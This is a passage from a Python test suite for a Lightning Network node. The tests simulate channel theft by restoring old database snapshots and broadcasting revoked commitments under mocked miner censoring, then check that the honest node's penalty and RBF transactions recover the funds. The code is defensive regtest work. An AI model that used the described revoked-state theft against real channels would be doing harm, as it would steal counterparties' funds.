wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
l1.rpc.connect(l1.info['id'], 'localhost', l1.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': [coin_mvt_plugin, balance_snaps],
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': [coin_mvt_plugin, balance_snaps],
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
# l2 moves on for closed l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('external', ['penalized'], None, None)],
'C': [('external', ['penalized'], None, None)],
}
expected_3 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'E')],
'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
'D': [('wallet', ['deposit'], None, None)],
'E': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_3['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
expected_3['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
if not chainparams['elements']:
# Also check snapshots
expected_bals_2 = [
{'blockheight': 101, 'accounts': [{'balance': '0msat'}]},
{'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
# There's a duplicate because we stop and restart l2 twice
# (both times at block 108)
{'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
]
check_balance_snaps(l2, expected_bals_2)
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2, now back a bit. force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
# l2 moves on for closed l3
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# after 5 blocks, l2 reclaims both their DELAYED_OUTPUT_TO_US and their delayed output
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'F'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'C')],
'C': [('external', ['penalized'], None, None)],
'E': [('cid1', ['htlc_tx'], ['to_wallet'], 'G')],
'F': [('wallet', ['deposit'], None, None)],
'G': [('wallet', ['deposit'], None, None)]
}
expected_3 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('external', ['stolen'], None, None), ('external', ['htlc_timeout'], ['htlc_timeout'], 'C')],
'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
'D': [('wallet', ['deposit'], None, None)],
'E': [('external', ['stolen'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_3['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
expected_3['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding thord
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
'watchtime-blocks': to_self_delay,
'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
channel_id = first_channel_id(l1, l2)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
# Use the bcli interface as well, so that we also check the
# bcli interface.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert(len(l2.rpc.listfunds()['outputs']) >= 1)
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding thord
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
'watchtime-blocks': to_self_delay,
'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
channel_id = first_channel_id(l1, l2)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
